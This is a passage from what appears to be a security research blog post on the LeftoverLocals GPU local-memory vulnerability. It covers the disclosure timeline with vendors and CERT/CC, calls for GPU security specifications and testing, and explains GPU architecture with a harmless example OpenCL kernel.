Since September 2023, we have been working with CERT/CC on a large coordinated disclosure involving all major GPU vendors, including NVIDIA, Apple, AMD, Arm, Intel, Qualcomm, and Imagination. Trail of Bits provided vendors a total of 125 days to test their products and provide remediations. The coordination gradually grew to include software stakeholders, including Google, Microsoft, and others, which allowed us to understand how LeftoverLocals impacts privacy requirements at different stages in the ML supply chain. Apple did not respond or engage with us regarding the disclosure until January 13, 2024. 

A high-level timeline of the disclosure is provided below: 

  • September 8, 2023: Trail of Bits submitted report to the CERT/CC 
  • September 11, 2023: CERT/CC acknowledged the submission of LeftoverLocals and began the process of vendor outreach and CVE assignment with a preliminary disclosure date of December 11, 2023 
  • September 14, 2023: AMD acknowledged the CERT disclosure 
  • September 15, 2023: Qualcomm acknowledged the CERT disclosure 
  • September 22, 2023: The case report was shared with Khronos and OpenCL working group 
  • September 29, 2023: NVIDIA acknowledged disclosure and confirmed they were not affected by the vulnerability 
  • November 22, 2023: ToB extended the embargo to January 16, 2024 to accommodate vendor requests for more time 
  • January 11, 2024: We received a notice that Qualcomm provided a patch to their firmware that addresses this issue only for some of their devices. Additionally, Google noted that ChromeOS Stable 120 and LTS 114 will be released on January 16 to include AMD and Qualcomm mitigations. 
  • January 13, 2024: Apple confirmed that the A17 and M3 series processors contain fixes to the vulnerability. 
  • January 14, 2024: Google notified us that they observed that some Imagination GPUs are impacted. 
  • January 16, 2024: Embargo lift and public disclosure of LeftoverLocals 

Moving forward 

Now that GPUs are being used in a wide range of applications, including privacy-sensitive applications, we believe that the wider GPU systems community (vendors, researchers, developers) must work towards hardening the GPU system stack and corresponding specifications. This should be accomplished through robust, holistic specifications that describe both GPU programs’ behavior and how GPU devices integrate with the rest of the system stack (e.g., the OS or hypervisor). Furthermore, these specifications should be rigorously tested to account for the diversity of GPU systems and the safety requirements of diverse application domains. Looking forward, a wide variety of new AI chips are being developed and will require rigorous security analysis. 

There are positive developments in this direction. For example, AMD’s ROCm stack is open, and thus available for independent rigorous evaluation, and the Khronos Group has safety-critical specification groups. Additionally, cross-vendor programming frameworks, such as Vulkan, have been incredibly useful for writing portable test suites, as opposed to single-vendor programming frameworks. 

While GPU security and privacy guarantees are scattered and scarce, the Vulkan specification outlines a reasonable definition of security for GPU platforms to adhere to—a definition that several platforms clearly violate, as our results show: 

… implementations must ensure that […] an application does not affect the integrity of the operating system[…]. In particular, any guarantees made by an operating system about whether memory from one process can be visible to another process or not must not be violated by a Vulkan implementation for any memory allocation. 

Given the role of Khronos specifications in this result, we included the Khronos Group in the coordinated disclosure. They connected us with representatives of various impacted vendors, and engaged in fruitful discussions about security specifications and testing. Prior to the release, Khronos released this statement in support of this work: 

Khronos welcomes the work by Tyler Sorensen and Trail of Bits to increase security around the usage of Khronos APIs and have been working closely with them for several months to ensure that API implementers are aware and able to act on any issues. Khronos is also diligently exploring additional actions relating to API specifications, conformance testing, and platform vendor cooperation to continually strengthen safety and security when using Khronos compute and rendering APIs. – Neil Trevett, Khronos President

With the dust settling, our position is the following: given the wide diversity of GPUs and their critical importance in enabling machine learning applications, these devices, and their ecosystems, are in need of (1) a detailed threat model that considers the various types of data processed on GPUs and how this data might be compromised; (2) an exploration of the GPU execution stack to determine where and how GPU security properties should be specified and implemented; and (3) significant testing and auditing to fortify the GPU ecosystem, which is the computational foundation of machine learning.

For full transparency, we note that Tyler Sorensen has been an invited member of the Khronos group (sponsored by Google) since 2019, and participates in the memory model technical specification group.

Acknowledgements: We thank Max Ammann, Dominik Czarnota, Kelly Kaoudis, Jay Little, and Adelin Travers for their insightful comments and feedback on the vulnerability, PoC, and throughout the disclosure process. We also thank the Khronos Group for discussing technical specification details with us, and providing an avenue for us to engage with many vendors. We thank CERT/CC, specifically Vijay Sarvepalli and Ben Koo, for organizing the coordinated disclosure, especially considering the potential breadth of the vulnerability. Thanks to Adam Sorensen and Trent Brunson for helping create the vulnerability logo. Finally, thank you to everyone who engaged with us on this issue. This was a large project and we had discussions with many people who provided valuable insights and perspectives.

Background: How GPUs work

GPUs are massively parallel, throughput-oriented co-processors. While originally designed to accelerate graphics workloads, their design, which balances flexible programming and high computational throughput, has been highly effective in a variety of applications. Perhaps the most impactful current application domain is machine learning, where GPUs are the computational workhorse and achieve nearly all major results in this area.

GPUs are not only in large servers; they are in our phones, our tablets, and our laptops. These GPUs come from a variety of vendors, with almost all major hardware vendors (Apple, AMD, Arm, Qualcomm, Intel, and Imagination) producing their own GPU architecture. These GPUs are increasingly used for ML tasks, especially because doing ML locally can preserve users’ privacy, achieve lower latency, and reduce computational burdens on service providers.

GPU architecture: GPU architecture has a parallel, hierarchical structure. At the top level, a GPU is made up of Compute Units (sometimes called Streaming Multiprocessors in NVIDIA literature). Large, discrete GPUs contain many compute units, and smaller, mobile GPUs have fewer. For example, the large AMD Radeon RX 7900 XT discrete GPU has 84 compute units, while the mobile Qualcomm Adreno 740 GPU has 8. All compute units have access to global memory. On discrete GPUs, global memory is implemented using VRAM; on integrated GPUs, global memory simply uses the CPU’s main memory.

Compute units encapsulate both compute and memory components. Compute units contain an array of processing elements; these simple cores are the fundamental units of computation and execute a stream of GPU instructions. In terms of memory, compute units often contain a cache for global memory, but they also contain a special region of memory called local memory. This is an optimized memory region that is shared only across processing elements in the same compute unit. This memory can be accessed with significantly less latency than global memory, but also has much smaller capacity. Different GPUs have varying amounts of local memory, typically ranging from 16KB to 64KB. For example, the AMD Radeon RX 7900 XT GPU has 84 compute units and a local memory size of 64KB; thus, the total amount of local memory on the GPU is ~5MB. Local memory is a software-managed cache: the program executing on the processing elements is responsible for loading values into local memory (e.g., values that will be repeatedly used from global memory).

[Figure: GPU architecture, showing compute units that contain processing elements and local memory, with global memory shared across compute units]

GPU execution model: A GPU program, called a (GPU) kernel, is written in a shader language. Common examples are SPIR-V (Vulkan), OpenCL C (OpenCL), and Metal Shading Language (Metal). These kernels specify a single entry point function, called the kernel function, which is executed by many invocations (i.e., GPU threads). Invocations have unique built-in identifiers (such as a global ID), which can be used to index a unique data element in a data-parallel program. Invocations are further partitioned into workgroups. Each workgroup is mapped to a compute unit (although many workgroups may execute on the same compute unit, depending on resource requirements). All invocations have access to the same global memory, but only invocations in the same workgroup share the same local memory.
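
To make this terminology concrete, here is a minimal illustrative OpenCL kernel (not from our PoC) that uses built-in identifiers, a workgroup-shared local memory buffer, and global memory:

// Minimal illustrative kernel: each invocation handles one element, and
// invocations in the same workgroup share a local-memory buffer.
__kernel void scale(__global const float *in, __global float *out,
                    const float k, __local float *tmp) {
  int gid = get_global_id(0);   // unique across the entire kernel launch
  int lid = get_local_id(0);    // unique only within this workgroup

  tmp[lid] = in[gid];           // stage a value in workgroup-shared local memory
  barrier(CLK_LOCAL_MEM_FENCE); // synchronize the workgroup's invocations

  out[gid] = k * tmp[lid];      // read back from local memory, write to global
}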

Applications that use the GPU often launch many short-running kernels. These kernels often correspond to basic operations, such as matrix multiplication or convolution. Kernels can then be executed in sequence; for example, each layer in a deep neural network will be a kernel execution. Local memory is statically allocated at each kernel launch and is not specified to persist across kernel calls.

Platforms generally do not time-multiplex different GPU kernels. That is, if multiple kernels are launched simultaneously (e.g., by different users), the GPU will execute one kernel to completion before the next kernel starts. Because GPU kernels are typically short running, sharing GPU resources at kernel boundaries saves expensive preemption overhead while also maintaining acceptable latency in practice. 

Terminology: Because this blog post focuses on portable GPU computing, it uses OpenCL GPU terminology. For readers more familiar with GPU terminology from a different framework (e.g., CUDA or Metal), we provide the following translation table: 

[Table: terminology translation across GPU frameworks (e.g., OpenCL local memory corresponds to CUDA shared memory and Metal threadgroup memory; an OpenCL workgroup corresponds to a CUDA thread block and a Metal threadgroup)]
